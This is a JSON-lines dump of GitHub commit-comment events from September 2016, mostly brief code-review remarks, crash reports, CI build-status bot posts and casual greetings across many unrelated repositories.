{"id":"4524841185","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18921619,"position":104,"line":282,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T01:06:27Z","updated_at":"2016-09-07T01:06:27Z","body":"Can't work because `get_data_retention_info` is not working."}},"created_at":"2016-09-07T01:06:27Z"}
{"id":"4524843120","type":"CommitCommentEvent","actor":{"login":"vnegrisolo"},"repo":{"name":"vnegrisolo/netflex"},"payload":{"comment":{"id":18921625,"position":36,"line":53,"path":"content.js","commit_id":"dbff5dfb45de68722e4b58dbf194f082ff437a2c","created_at":"2016-09-07T01:07:04Z","updated_at":"2016-09-07T01:07:04Z","body":"@greis is this ⚠️ solution that you have suggested?"}},"created_at":"2016-09-07T01:07:04Z"}
{"id":"4524843553","type":"CommitCommentEvent","actor":{"login":"dwhipps"},"repo":{"name":"AnalyticalGraphicsInc/cesium"},"payload":{"comment":{"id":18921628,"position":null,"line":null,"path":null,"commit_id":"7ce1facd111ffbbe89f83ad305451daf82a8bc66","created_at":"2016-09-07T01:07:14Z","updated_at":"2016-09-07T01:07:14Z","body":"Line 68 in Source/Shaders/BillboardCollectionVS.glsl of this commit causes the \"rotation\" paramter to be ignored when \"sizeInMeters\" is set to true. It's not immediately obvious to me what the fix is. Any chance @bagnell can fix this?"}},"created_at":"2016-09-07T01:07:14Z"}
{"id":"4524860218","type":"CommitCommentEvent","actor":{"login":"wall-t"},"repo":{"name":"PSNB92/Tetris"},"payload":{"comment":{"id":18921653,"position":null,"line":null,"path":null,"commit_id":"52777a90f86df0cad3d5f68e136d3ec11cbe3df6","created_at":"2016-09-07T01:13:06Z","updated_at":"2016-09-07T01:13:06Z","body":"ta  meio difícil de entender mesmo...mas vamo lá!"}},"created_at":"2016-09-07T01:13:06Z"}
{"id":"4524862487","type":"CommitCommentEvent","actor":{"login":"kyj2806"},"repo":{"name":"kyj2806/kyj2806"},"payload":{"comment":{"id":18921655,"position":1,"line":1,"path":"README.md","commit_id":"f93cec3fc26a26c36ea1d163785d0af4d153e85a","created_at":"2016-09-07T01:13:53Z","updated_at":"2016-09-07T01:13:53Z","body":"김영진"}},"created_at":"2016-09-07T01:13:53Z"}
{"id":"4524865242","type":"CommitCommentEvent","actor":{"login":"MikeLing"},"repo":{"name":"mozilla/ouija"},"payload":{"comment":{"id":18921664,"position":null,"line":null,"path":null,"commit_id":"10eb405dd2efb69ab63cc8df8ad1400d74777d8c","created_at":"2016-09-07T01:14:47Z","updated_at":"2016-09-07T01:14:47Z","body":"This looks good to me! Maybe we need to apply these code on master and heroku branch also? And I had noticed that we have a new branch named 'migration', could you tell me what's that for? Thank you :)"}},"created_at":"2016-09-07T01:14:47Z"}
{"id":"4524865919","type":"CommitCommentEvent","actor":{"login":"MikeLing"},"repo":{"name":"mozilla/ouija"},"payload":{"comment":{"id":18921666,"position":null,"line":null,"path":null,"commit_id":"10eb405dd2efb69ab63cc8df8ad1400d74777d8c","created_at":"2016-09-07T01:15:03Z","updated_at":"2016-09-07T01:15:03Z","body":"r+!"}},"created_at":"2016-09-07T01:15:03Z"}
{"id":"4524867687","type":"CommitCommentEvent","actor":{"login":"simon1215"},"repo":{"name":"simon1215/test"},"payload":{"comment":{"id":18921675,"position":null,"line":null,"path":null,"commit_id":"451453e1c9af8eacd8aac673a684efc18bc2653e","created_at":"2016-09-07T01:15:39Z","updated_at":"2016-09-07T01:15:39Z","body":"sdfadsfasfdsf"}},"created_at":"2016-09-07T01:15:39Z"}
{"id":"4524870117","type":"CommitCommentEvent","actor":{"login":"TheSeven"},"repo":{"name":"aidancbrady/Mekanism"},"payload":{"comment":{"id":18921684,"position":7,"line":135,"path":"src/main/java/mekanism/client/render/obj/TransmitterModel.java","commit_id":"c314ae159422f709495a81e4831f787d9d23a929","created_at":"2016-09-07T01:16:26Z","updated_at":"2016-09-07T01:16:26Z","body":"This causes a crash: https://paste.ee/p/PbQp0\r\n\r\njava.lang.NoClassDefFoundError: scala/actors/threadpool/Arrays\r\n\tat mekanism.common.multipart.ConnectionProperty.valueToString(ConnectionProperty.java:48)\r\n\tat mekanism.client.render.obj.TransmitterModel.func_188616_a(TransmitterModel.java:135)"}},"created_at":"2016-09-07T01:16:26Z"}
{"id":"4524872777","type":"CommitCommentEvent","actor":{"login":"kirangonella"},"repo":{"name":"kirangonella/tutorials"},"payload":{"comment":{"id":18921695,"position":null,"line":null,"path":null,"commit_id":"657d1a507f25b8e7f1163c76e109735002843315","created_at":"2016-09-07T01:17:23Z","updated_at":"2016-09-07T01:17:23Z","body":"spring mvc integration with Tiles"}},"created_at":"2016-09-07T01:17:23Z"}
{"id":"4524877058","type":"CommitCommentEvent","actor":{"login":"Ozymandias81"},"repo":{"name":"Realm667/WolfenDoom"},"payload":{"comment":{"id":18921706,"position":null,"line":null,"path":null,"commit_id":"9ee8de17bd3cbad6f01d3bcd7036d7f20c4e594c","created_at":"2016-09-07T01:18:57Z","updated_at":"2016-09-07T01:18:57Z","body":"Ok, unfortunately with this new tweak I didn't notice changes on my side, probably I gained just 1-2fps at least as you can see from this screenshot...\r\n![screenshot_doom_20160907_025006](https://cloud.githubusercontent.com/assets/11136108/18296067/eac836f4-74a6-11e6-8637-edf5e54da2a4.png)\r\n...but I noticed a couple of things:\r\n\r\n- If I lower the number of lights on SpotlightGlow actor obviously I get a nice perfomance increment (I set it to 1 instead of 25 and also I changed the gldef color value to 1.0 for all instead of 0.7, just to give it a bit of strenght) ...\r\n![screenshot_doom_20160907_031213](https://cloud.githubusercontent.com/assets/11136108/18296311/0bcd5d46-74a9-11e6-9f82-ae989d8b9fcc.png)\r\n\r\n- If I destroy all other SpotLights which are not on LOS, whitout changin' the actor itself I get another good performance improvement too...\r\n![screenshot_doom_20160907_031857](https://cloud.githubusercontent.com/assets/11136108/18296413/cabdea36-74a9-11e6-96b3-ce8b7fd4453a.png)\r\n"}},"created_at":"2016-09-07T01:18:57Z"}
{"id":"4524878400","type":"CommitCommentEvent","actor":{"login":"Edwinbeto"},"repo":{"name":"De16liz/proyecto1"},"payload":{"comment":{"id":18921711,"position":null,"line":null,"path":null,"commit_id":"d5fe6fb0394f5080dd812a31b7b5c9ccdef73462","created_at":"2016-09-07T01:19:26Z","updated_at":"2016-09-07T01:19:26Z","body":"por aqui paso Edwin  :)   :+1: "}},"created_at":"2016-09-07T01:19:26Z"}
{"id":"4524880832","type":"CommitCommentEvent","actor":{"login":"Edwinbeto"},"repo":{"name":"stmendozza/proyecto1"},"payload":{"comment":{"id":18921717,"position":null,"line":null,"path":null,"commit_id":"1ee4fde36fd4ffd9185cbd2547c2766a98e77617","created_at":"2016-09-07T01:20:18Z","updated_at":"2016-09-07T01:20:18Z","body":"por aqui paso Edwin :)  :+1: "}},"created_at":"2016-09-07T01:20:18Z"}
{"id":"4524883013","type":"CommitCommentEvent","actor":{"login":"Edwinbeto"},"repo":{"name":"camilofigueroa/ensayo"},"payload":{"comment":{"id":18921722,"position":null,"line":null,"path":null,"commit_id":"3aa29bbf71cc4d29951ce92b01cebdafe36d2d45","created_at":"2016-09-07T01:21:05Z","updated_at":"2016-09-07T01:21:05Z","body":"por aqui paso Edwin :)  :+1: "}},"created_at":"2016-09-07T01:21:05Z"}
{"id":"4524884488","type":"CommitCommentEvent","actor":{"login":"justinmk"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":18921726,"position":15,"line":5492,"path":"runtime/doc/eval.txt","commit_id":"d9d2c2fcc0a6e371355a8f2942cf8cb0f3189385","created_at":"2016-09-07T01:21:35Z","updated_at":"2016-09-07T01:21:35Z","body":"Wouldn't we also need to mention it for the \"With two arguments\" case below? We may say these cases are covered by the introduction at [lines 5479-5480](https://github.com/neovim/neovim/commit/d9d2c2fcc0a6e371355a8f2942cf8cb0f3189385#diff-bea881dfa9626bab7141337b0fcdb23eR5479)."}},"created_at":"2016-09-07T01:21:35Z"}
{"id":"4524886156","type":"CommitCommentEvent","actor":{"login":"Edwinbeto"},"repo":{"name":"derlyjohanna/proyecto-1"},"payload":{"comment":{"id":18921731,"position":null,"line":null,"path":null,"commit_id":"76a7ea569781f6cf668fec861edab53928bd0d06","created_at":"2016-09-07T01:22:12Z","updated_at":"2016-09-07T01:22:12Z","body":"por aqui paso Edwin :)   :+1: "}},"created_at":"2016-09-07T01:22:12Z"}
{"id":"4524887945","type":"CommitCommentEvent","actor":{"login":"fengjh"},"repo":{"name":"qor/admin"},"payload":{"comment":{"id":18921739,"position":7,"line":194,"path":"meta.go","commit_id":"d92f0ed5103faf10e60cb8c093eb7a981f73544d","created_at":"2016-09-07T01:22:46Z","updated_at":"2016-09-07T01:22:46Z","body":"The Daybreak project has a struct called `Schedule` that contains an sql.Scanner `PingSchedule`. And it can't be added to the QOR admin as a resource. It'll panic with `reflect: call of reflect.Value.Field on slice Value`.\r\n\r\n```\r\npanic: reflect: call of reflect.Value.Field on slice Value\r\n\r\ngoroutine 1 [running]:\r\npanic(0x990520, 0xc8203211a0)\r\n       \t/usr/local/opt/go/libexec/src/runtime/panic.go:481 +0x3e6\r\nreflect.Value.Field(0x9a40c0, 0xc820321180, 0x197, 0x0, 0x0, 0x0, 0x0)\r\n       \t/usr/local/opt/go/libexec/src/reflect/value.go:742 +0x90\r\ngithub.com/theplant/hsm2-backend/vendor/github.com/qor/admin.(*Meta).updateMeta(0xc820266900)\r\n       \t/Users/hui/Codes/Go/src/github.com/theplant/hsm2-backend/vendor/github.com/qor/admin/meta.go:204 +0x549\r\ngithub.com/theplant/hsm2-backend/vendor/github.com/qor/admin.(*Resource).GetMetaOrNew(0xc82049ea80, 0xb08d10, 0x5, 0x1)\r\n       \t/Users/hui/Codes/Go/src/github.com/theplant/hsm2-backend/vendor/github.com/qor/admin/resource.go:550 +0x1a7\r\ngithub.com/theplant/hsm2-backend/vendor/github.com/qor/admin.(*Resource).ConvertSectionToMetas(0xc82049ea80, 0xc820320bc0, 0x3, 0x4, 0x0, 0x0, 0x0)\r\n       \t/Users/hui/Codes/Go/src/github.com/theplant/hsm2-backend/vendor/github.com/qor/admin/section.go:129 +0x1cc\r\ngithub.com/theplant/hsm2-backend/vendor/github.com/qor/admin.(*Admin).MountTo.func1(0xc82049ea80, 0xc82027b140, 0x4, 0x4)\r\n       \t/Users/hui/Codes/Go/src/github.com/theplant/hsm2-backend/vendor/github.com/qor/admin/route.go:238 +0xf37\r\ngithub.com/theplant/hsm2-backend/vendor/github.com/qor/admin.(*Admin).MountTo(0xc8202d8580, 0xb05d60, 0x6, 0xc82015a600)\r\n       \t/Users/hui/Codes/Go/src/github.com/theplant/hsm2-backend/vendor/github.com/qor/admin/route.go:267 +0x3c8\r\ngithub.com/theplant/hsm2-backend/config/routes.Mux(0x0, 0x0)\r\n       \t/Users/hui/Codes/Go/src/github.com/theplant/hsm2-backend/config/routes/routes.go:61 +0x966\r\nmain.main()\r\n       \t/Users/hui/Codes/Go/src/github.com/theplant/hsm2-backend/main.go:33 +0x8a\r\n```\r\n\r\n- - - - - - - - \r\n\r\n```go\r\ntype pingType string\r\n\r\ntype Ping struct {\r\n\tType      pingType  `json:\"type\"`\r\n\tTriggerAt time.Time `json:\"trigger_at\"`\r\n}\r\n\r\ntype PingSchedule []Ping\r\n\r\ntype Schedule struct {\r\n    // other fields...\r\n\tPings PingSchedule `sql:\"type:json;not null\" json:\"schedule\"`\r\n}\r\n\r\n// Scan deserializes `[{\"type\":\"a\"}, {\"type\":\"b\"}, ..., {\"type\":\"g\"}]` into `PingSchedule{Ping{\"a\"}, Ping{\"b\"}, ..., Ping{\"g\"}}`\r\nfunc (ps *PingSchedule) Scan(src interface{}) error {\r\n\treturn json.Unmarshal(src.([]byte), ps)\r\n}\r\n```\r\n\r\n```go\r\n// add to QOR admin as a resource\r\nAdmin.AddResource(&pings.Schedule{})\r\n```"}},"created_at":"2016-09-07T01:22:46Z"}
{"id":"4524888461","type":"CommitCommentEvent","actor":{"login":"pgkirsch"},"repo":{"name":"hoburg/gpkit"},"payload":{"comment":{"id":18921741,"position":null,"line":null,"path":null,"commit_id":"2d175239499ea474869857b515e823a00f87e681","created_at":"2016-09-07T01:22:57Z","updated_at":"2016-09-07T01:22:57Z","body":"Yes"}},"created_at":"2016-09-07T01:22:57Z"}
{"id":"4524888480","type":"CommitCommentEvent","actor":{"login":"Edwinbeto"},"repo":{"name":"zuleta/PROYECTO1"},"payload":{"comment":{"id":18921742,"position":null,"line":null,"path":null,"commit_id":"d723ee250a87de5c71c389c9f898c8e61534dcc1","created_at":"2016-09-07T01:22:58Z","updated_at":"2016-09-07T01:22:58Z","body":"por aqui paso Edwin :)  :+1: "}},"created_at":"2016-09-07T01:22:58Z"}
{"id":"4524893713","type":"CommitCommentEvent","actor":{"login":"ComGoon"},"repo":{"name":"ComGoon/ComGoon"},"payload":{"comment":{"id":18921755,"position":null,"line":null,"path":null,"commit_id":"2e1889c62cd769167f5ec9105ef6ccc03954ce12","created_at":"2016-09-07T01:24:51Z","updated_at":"2016-09-07T01:24:51Z","body":"am new here!"}},"created_at":"2016-09-07T01:24:51Z"}
{"id":"4524894394","type":"CommitCommentEvent","actor":{"login":"basarat"},"repo":{"name":"Microsoft/TypeScript"},"payload":{"comment":{"id":18921757,"position":null,"line":null,"path":null,"commit_id":"46856462816b54e32a9d962e218d6e3f8ff42348","created_at":"2016-09-07T01:25:08Z","updated_at":"2016-09-07T01:25:08Z","body":"🎉 💯 x🌹 "}},"created_at":"2016-09-07T01:25:08Z"}
{"id":"4524894404","type":"CommitCommentEvent","actor":{"login":"Edwinbeto"},"repo":{"name":"Guidohvc/proyecto1"},"payload":{"comment":{"id":18921758,"position":null,"line":null,"path":null,"commit_id":"6a9257b47d5b0b6fee7fa3b2dae71159ded7ae81","created_at":"2016-09-07T01:25:09Z","updated_at":"2016-09-07T01:25:09Z","body":"por aqui paso Edwin :)  :+1: "}},"created_at":"2016-09-07T01:25:09Z"}
{"id":"4524894936","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"SpencerLJack/homework-portfolio"},"payload":{"comment":{"id":18921760,"position":179,"line":179,"path":"Week 7/Assignment/starter_code/css/style.css","commit_id":"35b3911ae4dce85b8fab74c46de021abe2eafb48","created_at":"2016-09-07T01:25:19Z","updated_at":"2016-09-07T01:25:19Z","body":"It may have been better to leave the widths for the main section and sidebar as percentages. The sidebar breaks to the next line at narrow widths before your breakpoint. "}},"created_at":"2016-09-07T01:25:19Z"}
{"id":"4524894938","type":"CommitCommentEvent","actor":{"login":"fbormann"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":18921761,"position":null,"line":null,"path":null,"commit_id":"c9f59a8c9d0f0383733a97cd6255759ea5932932","created_at":"2016-09-07T01:25:19Z","updated_at":"2016-09-07T01:25:19Z","body":"@ailsoncgt  nesse teu commit existe mais de uma responsabilidade: Você modificou Models, Urls e nada do que o commit realmente fala \"Test Edit User\". Divide em mais commits, tem problema não."}},"created_at":"2016-09-07T01:25:19Z"}
{"id":"4524898701","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"SpencerLJack/homework-portfolio"},"payload":{"comment":{"id":18921773,"position":351,"line":351,"path":"Week 7/Assignment/starter_code/css/style.css","commit_id":"35b3911ae4dce85b8fab74c46de021abe2eafb48","created_at":"2016-09-07T01:26:40Z","updated_at":"2016-09-07T01:26:40Z","body":"This doesn't seem to do anything"}},"created_at":"2016-09-07T01:26:40Z"}
{"id":"4524900188","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"SpencerLJack/homework-portfolio"},"payload":{"comment":{"id":18921778,"position":419,"line":419,"path":"Week 7/Assignment/starter_code/css/style.css","commit_id":"35b3911ae4dce85b8fab74c46de021abe2eafb48","created_at":"2016-09-07T01:27:13Z","updated_at":"2016-09-07T01:27:13Z","body":"nice"}},"created_at":"2016-09-07T01:27:13Z"}
{"id":"4524902323","type":"CommitCommentEvent","actor":{"login":"MrMC"},"repo":{"name":"koying/libdroidjni"},"payload":{"comment":{"id":18921785,"position":12,"line":148,"path":"AudioTrack.cpp","commit_id":"916b2efab7fe0962b13f7158500d435ffaf853ad","created_at":"2016-09-07T01:28:02Z","updated_at":"2016-09-07T01:28:02Z","body":"c/p monster ? need four params so \"([BII)I\" -> \"([BIII)I\""}},"created_at":"2016-09-07T01:28:02Z"}
{"id":"4524902759","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"SpencerLJack/homework-portfolio"},"payload":{"comment":{"id":18921787,"position":null,"line":null,"path":null,"commit_id":"35b3911ae4dce85b8fab74c46de021abe2eafb48","created_at":"2016-09-07T01:28:14Z","updated_at":"2016-09-07T01:28:14Z","body":"Nice work. Very meticulous application of rems for the various margins and padding on the page. Try experimenting with a mixture of percentages and rems to get the best of both worlds with your layouts. "}},"created_at":"2016-09-07T01:28:14Z"}
{"id":"4524903702","type":"CommitCommentEvent","actor":{"login":"sensencoder"},"repo":{"name":"yuantiku/YTKNetwork"},"payload":{"comment":{"id":18921789,"position":null,"line":null,"path":null,"commit_id":"aa89c0261dafe07dd8386dab584ba89c95cafbf6","created_at":"2016-09-07T01:28:35Z","updated_at":"2016-09-07T01:28:35Z","body":"下载下来报红"}},"created_at":"2016-09-07T01:28:35Z"}
{"id":"4524904143","type":"CommitCommentEvent","actor":{"login":"fbormann"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":18921790,"position":null,"line":null,"path":null,"commit_id":"08027c28247101620649e8ca0b7d367e51035176","created_at":"2016-09-07T01:28:43Z","updated_at":"2016-09-07T01:28:43Z","body":"O .gitignore do @jailson0100  já resolveu o problema da pasta. \r\n\r\nMas você modificou o settings.py, o base.html e o amadeus.css no mesmo commit. \r\nTodos tiveram a finalidade de ajudar na Issue #22 , presta atenção nas responsabilidades de cada commit."}},"created_at":"2016-09-07T01:28:43Z"}
{"id":"4524905943","type":"CommitCommentEvent","actor":{"login":"yataoXu"},"repo":{"name":"yataoXu/demo"},"payload":{"comment":{"id":18921794,"position":2,"line":2,"path":"README.md","commit_id":"f59018e6b3cdcf1cad674ffe73d9a79eb0405f01","created_at":"2016-09-07T01:29:23Z","updated_at":"2016-09-07T01:29:23Z","body":"public static void main(String args[]}{}"}},"created_at":"2016-09-07T01:29:23Z"}
{"id":"4524906338","type":"CommitCommentEvent","actor":{"login":"sensencoder"},"repo":{"name":"yuantiku/YTKNetwork"},"payload":{"comment":{"id":18921796,"position":null,"line":null,"path":null,"commit_id":"aa89c0261dafe07dd8386dab584ba89c95cafbf6","created_at":"2016-09-07T01:29:30Z","updated_at":"2016-09-07T01:29:30Z","body":"等待新的Demo，谢谢，，impatient"}},"created_at":"2016-09-07T01:29:30Z"}
{"id":"4524906424","type":"CommitCommentEvent","actor":{"login":"WayofTime"},"repo":{"name":"WayofTime/BloodMagic"},"payload":{"comment":{"id":18921797,"position":null,"line":null,"path":null,"commit_id":"7f2469865103420e28424d65151f1d7651fb0e0b","created_at":"2016-09-07T01:29:32Z","updated_at":"2016-09-07T01:29:32Z","body":"Oops."}},"created_at":"2016-09-07T01:29:32Z"}
{"id":"4524906620","type":"CommitCommentEvent","actor":{"login":"Shoeboxam"},"repo":{"name":"Soartex-Modded/Modded-1.7.x"},"payload":{"comment":{"id":18921800,"position":null,"line":null,"path":null,"commit_id":"34b80e63ccbb73d1562ca7adf336794d961f5bd2","created_at":"2016-09-07T01:29:38Z","updated_at":"2016-09-07T01:29:38Z","body":"I like it! Some of the recolors are just much too saturated. Glad you made the changes."}},"created_at":"2016-09-07T01:29:38Z"}
{"id":"4524907209","type":"CommitCommentEvent","actor":{"login":"yataoXu"},"repo":{"name":"yataoXu/demo"},"payload":{"comment":{"id":18921802,"position":null,"line":null,"path":null,"commit_id":"f59018e6b3cdcf1cad674ffe73d9a79eb0405f01","created_at":"2016-09-07T01:29:51Z","updated_at":"2016-09-07T01:29:51Z","body":"ssssss"}},"created_at":"2016-09-07T01:29:51Z"}
{"id":"4524909074","type":"CommitCommentEvent","actor":{"login":"fbormann"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":18921806,"position":null,"line":null,"path":null,"commit_id":"4d8ff820d0df608b810884f525c4bc05f112e0db","created_at":"2016-09-07T01:30:31Z","updated_at":"2016-09-07T01:30:31Z","body":"@jailson0100  Não sei se tu fez esse commit apenas para testar a sintaxe do .gitignore mas se tu fez: quando tu commitar algo que é pra teste, comita mas antes de dar \"push\" ou continuar outra tarefa, volta ao estado anterior utilizando o comando \"git checkout 'código do commit anterior' \", que ele vai voltar pro estado do commit anterior."}},"created_at":"2016-09-07T01:30:31Z"}
{"id":"4524909838","type":"CommitCommentEvent","actor":{"login":"skyline75489"},"repo":{"name":"yuantiku/YTKNetwork"},"payload":{"comment":{"id":18921808,"position":null,"line":null,"path":null,"commit_id":"aa89c0261dafe07dd8386dab584ba89c95cafbf6","created_at":"2016-09-07T01:30:47Z","updated_at":"2016-09-07T01:30:47Z","body":"请在 Demo 文件夹下运行 `pod install` 然后打开 xcworkspace"}},"created_at":"2016-09-07T01:30:47Z"}
{"id":"4524910964","type":"CommitCommentEvent","actor":{"login":"De16liz"},"repo":{"name":"Edwinbeto/proyecto1"},"payload":{"comment":{"id":18921813,"position":null,"line":null,"path":null,"commit_id":"0546eabe2d85e93f49af360931769c3322d38d86","created_at":"2016-09-07T01:31:11Z","updated_at":"2016-09-07T01:31:11Z","body":"bien compañero :+1: "}},"created_at":"2016-09-07T01:31:11Z"}
{"id":"4524911876","type":"CommitCommentEvent","actor":{"login":"De16liz"},"repo":{"name":"Edwinbeto/proyecto1"},"payload":{"comment":{"id":18921818,"position":null,"line":null,"path":null,"commit_id":"0546eabe2d85e93f49af360931769c3322d38d86","created_at":"2016-09-07T01:31:32Z","updated_at":"2016-09-07T01:31:32Z","body":"thanks you"}},"created_at":"2016-09-07T01:31:32Z"}
{"id":"4524918227","type":"CommitCommentEvent","actor":{"login":"ecanzonieri"},"repo":{"name":"Yelp/kafka-utils"},"payload":{"comment":{"id":18921828,"position":22,"line":608,"path":"tests/kafka_cluster_manager/rg_test.py","commit_id":"d2de8bb7f33be60daf14a2ef9a963cf356fd6b2e","created_at":"2016-09-07T01:33:49Z","updated_at":"2016-09-07T01:33:49Z","body":"Instead of sorting all the lists, why don't we use set?"}},"created_at":"2016-09-07T01:33:49Z"}
{"id":"4524920040","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18921832,"position":null,"line":null,"path":null,"commit_id":"9bd9ec3f586c379d214a670a5fa5e8c2f912ae54","created_at":"2016-09-07T01:34:29Z","updated_at":"2016-09-07T01:34:29Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (2334 of 2334 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9bd9ec3f586c379d214a670a5fa5e8c2f912ae54-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9bd9ec3f586c379d214a670a5fa5e8c2f912ae54-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-07T01:34:29Z"}
{"id":"4524920084","type":"CommitCommentEvent","actor":{"login":"ChrisRus"},"repo":{"name":"Hyzual/knotsjs"},"payload":{"comment":{"id":18921833,"position":21,"line":21,"path":"lib/dependencies.js","commit_id":"4e1d556f82b35ea7da494000cef08c5025fdb9fc","created_at":"2016-09-07T01:34:30Z","updated_at":"2016-09-07T01:34:30Z","body":"Nice! I am pleased to see you're using jsgraph - this looks like a perfect application. Ping me if you have questions or encounter any problems. Regards, Chris"}},"created_at":"2016-09-07T01:34:30Z"}
{"id":"4524920880","type":"CommitCommentEvent","actor":{"login":"sensencoder"},"repo":{"name":"yuantiku/YTKNetwork"},"payload":{"comment":{"id":18921836,"position":null,"line":null,"path":null,"commit_id":"aa89c0261dafe07dd8386dab584ba89c95cafbf6","created_at":"2016-09-07T01:34:47Z","updated_at":"2016-09-07T01:34:47Z","body":"谢谢"}},"created_at":"2016-09-07T01:34:47Z"}
{"id":"4524924711","type":"CommitCommentEvent","actor":{"login":"mattdrose"},"repo":{"name":"carpages/gemini-css"},"payload":{"comment":{"id":18921844,"position":null,"line":null,"path":null,"commit_id":"5a2ac56dbe58a656691873ef89c6f8e3692e0bdf","created_at":"2016-09-07T01:36:10Z","updated_at":"2016-09-07T01:36:10Z","body":"Yea. It might be worth an audit, but I'm guessing the colours of border are more diverse than positioning. If I were to guess, `@include border($color);` would be more useful than `@include border('bottom');`"}},"created_at":"2016-09-07T01:36:10Z"}
{"id":"4524926678","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18921848,"position":null,"line":null,"path":null,"commit_id":"148e29cfaf7f976a5d7fee79c363273d6edce2ff","created_at":"2016-09-07T01:36:50Z","updated_at":"2016-09-07T01:36:50Z","body":"os_2_0_develop (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-148e29cfaf7f976a5d7fee79c363273d6edce2ff-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-148e29cfaf7f976a5d7fee79c363273d6edce2ff-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T01:36:50Z"}
{"id":"4524927098","type":"CommitCommentEvent","actor":{"login":"mattdrose"},"repo":{"name":"carpages/gemini-css"},"payload":{"comment":{"id":18921852,"position":null,"line":null,"path":null,"commit_id":"5a2ac56dbe58a656691873ef89c6f8e3692e0bdf","created_at":"2016-09-07T01:36:58Z","updated_at":"2016-09-07T01:36:58Z","body":"You're right about `solid` and `1px` almost always being the same."}},"created_at":"2016-09-07T01:36:58Z"}
{"id":"4524929293","type":"CommitCommentEvent","actor":{"login":"ecanzonieri"},"repo":{"name":"Yelp/kafka-utils"},"payload":{"comment":{"id":18921856,"position":22,"line":608,"path":"tests/kafka_cluster_manager/rg_test.py","commit_id":"d2de8bb7f33be60daf14a2ef9a963cf356fd6b2e","created_at":"2016-09-07T01:37:47Z","updated_at":"2016-09-07T01:37:47Z","body":"We also don't need to use str(p.topic) but we should be able to compare topics as set of objects.\r\nsomething like: possible1 = set([p10.topic, p20.topic, p30.topic]) possible2 = set([p10.topic, p20.topic, p30.topic])\r\nassert set(b1_topics) == possible1 or set(b1_topics) == possible2\r\n...."}},"created_at":"2016-09-07T01:37:47Z"}
{"id":"4524929991","type":"CommitCommentEvent","actor":{"login":"blueweather"},"repo":{"name":"jushenziao/LauncherDemo"},"payload":{"comment":{"id":18921860,"position":15,"line":4542,"path":"launcher3/src/main/java/com/vdroid/launcher3/Workspace.java","commit_id":"34b8281d725d2ad611314d76090f16c5182b62fd","created_at":"2016-09-07T01:38:01Z","updated_at":"2016-09-07T01:38:01Z","body":"为什么要放进try里边"}},"created_at":"2016-09-07T01:38:01Z"}
{"id":"4524930720","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18921867,"position":null,"line":null,"path":null,"commit_id":"148e29cfaf7f976a5d7fee79c363273d6edce2ff","created_at":"2016-09-07T01:38:15Z","updated_at":"2016-09-07T01:38:15Z","body":"os_2_0_develop (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-148e29cfaf7f976a5d7fee79c363273d6edce2ff-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-148e29cfaf7f976a5d7fee79c363273d6edce2ff-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T01:38:15Z"}
{"id":"4524930734","type":"CommitCommentEvent","actor":{"login":"dennisss"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":18921868,"position":1,"line":1,"path":"cmake/configs/nuttx_crazyflie_default.cmake","commit_id":"1b4dabea9f018d406bea8d3453b2a0566c787ab1","created_at":"2016-09-07T01:38:15Z","updated_at":"2016-09-07T01:38:15Z","body":"@davids5 Overall looks good! In case it can be useful, the schematic is [here](https://wiki.bitcraze.io/_media/projects:crazyflie2:hardware:crazyflie_2.0_rev.c_schematics.pdf) (Only the first two pages are relevant). I'll go try it on my HW and let you know how it goes."}},"created_at":"2016-09-07T01:38:15Z"}
{"id":"4524933481","type":"CommitCommentEvent","actor":{"login":"spectre-php"},"repo":{"name":"spectre-php/weiphp"},"payload":{"comment":{"id":18921876,"position":1,"line":1,"path":"README.md","commit_id":"a1f15db9dcc8655c1ac867062c4caf9d615c851d","created_at":"2016-09-07T01:39:20Z","updated_at":"2016-09-07T01:39:20Z","body":"\r\nMYSQL优化\r\n\r\n"}},"created_at":"2016-09-07T01:39:20Z"}
